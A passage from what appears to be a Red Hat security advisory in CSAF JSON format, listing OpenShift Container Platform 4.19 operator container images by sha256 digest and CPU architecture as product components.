"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
